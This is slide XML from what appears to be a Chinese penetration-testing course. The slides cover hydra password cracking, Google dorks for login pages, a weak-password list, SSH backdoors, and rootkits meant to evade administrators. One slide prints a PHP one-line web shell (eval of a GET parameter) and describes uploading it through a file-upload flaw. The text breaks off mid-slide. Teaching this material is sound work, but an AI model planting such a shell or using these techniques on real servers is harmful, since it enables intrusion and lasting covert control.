          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9207768" y="5073134"/>
            <a:ext cx="3289690" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>破解得到用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33384136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三、渗透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后台</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="11669216" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后台页面地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Google Hack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语法可以搜索特定网站的登录页，例如使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site:[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网站名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>manage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等关键词。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>弱口令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>常见弱口令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>12345678</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>88888888</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>123456789</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1234567890</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>11111111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1111111111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>mimamima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>qwertyuiop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>12345678901</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>520520520</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0123456789</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0987654321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>66666666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>999999999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0000000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ABCD1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1234512345</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>bugaosuni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>asdfghjkl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>qweasdzxc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>123654789+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>741258963+-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>22222222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>77777777</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>20142014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>55555555</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1234qwer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>qwer1234</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178608750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2050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165600"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="972516"/>
            <a:ext cx="7200800" cy="5441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介绍</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信息收集</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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内网渗透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社会工程学</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检测</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endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="2409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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29311352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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="11669216" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	Secure Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（安全外壳协议，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）是一种加密的网络传输协议，可在不安全的网络中为网络服务提供安全的传输环境。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通过在网络中创建安全隧道来实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>客户端与服务器之间的连接。虽然任何网络服务都可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实现安全传输，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>最常见的用途是远程登录系统，人们通常利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>来传输命令行界面和远程执行命令。使用频率最高的场合类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>操作系统也能有限度地使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年，微软宣布将在未来的操作系统中提供原生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议支持。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>所谓后门是在渗透完成之后的阶段，攻击者获取到一台服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>权限后，需要通过后门长期能够控制这台服务器，同时后门又需要躲避管理员的检测。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>连接远程机器并执行命令：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF103264-BB68-4804-9B1E-B7AFCB053E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156866" y="2174034"/>
            <a:ext cx="10066696" cy="3674030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3870420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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="11669216" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一种特殊的恶意软件，它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息，比较多见到的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一般都和木马、后门等其他恶意程序结合使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一句话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。为了绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的检测，一句话木马出现了无数中变形，但本质是不变的：木马的函数执行了我们发送的命令。其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一句话木马通过接收系统指令形式的网络请求参数在目标系统上执行，从而达到木马的功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一句话木马：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;?php eval(@$_GET['a']); ?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351656205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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2008805"/>
            <a:ext cx="4969837" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用文件上传漏洞上传包含有一句话木马的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE7269CA-936D-4A35-AA11-C4C2FC2C3096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="4178855"/>
            <a:ext cx="4969837" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
